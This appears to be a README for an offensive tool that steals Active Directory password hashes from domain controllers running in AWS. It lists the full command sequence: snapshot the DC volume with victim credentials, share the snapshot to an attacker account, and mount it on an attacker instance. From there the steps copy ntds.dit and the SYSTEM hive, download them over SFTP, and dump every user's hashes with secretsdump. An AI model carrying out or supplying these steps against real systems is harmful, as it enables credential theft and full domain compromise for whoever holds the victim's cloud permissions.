This tool implements a cloud version of the Shadow Copy attack against domain controllers running in AWS. Any AWS user possessing the EC2:CreateSnapshot permission can steal the hashes of all domain users by creating a snapshot of the Domain Controller mounting it to an instance they control and exporting the NTDS.dit and SYSTEM registry hive file for use with Impacket's secretsdump project.
- Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
- Run "Describe-Instances" and show in list for attacker to select
- Run "Create-Snapshot" on volume of selected instance
- Run "modify-snapshot-attribute" on new snapshot to set "createVolumePermission" to attacker AWS Account
- Load AWS CLI with Attacker Credentials
- Run "run-instance" command to create new linux ec2 with our stolen snapshot
- Ssh run "sudo mkdir /windows"
- Ssh run "sudo mount /dev/xvdf1 /windows/"
- Ssh run "sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"
- Ssh run "sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"
- Ssh run "sudo chown ec2-user:ec2-user /home/ec2-user/*"
- SFTP get "/home/ec2-user/SYSTEM ./SYSTEM"
- SFTP get "/home/ec2-user/ntds.dit ./ntds.dit"
- locally run "secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets #expects secretsdump to be on path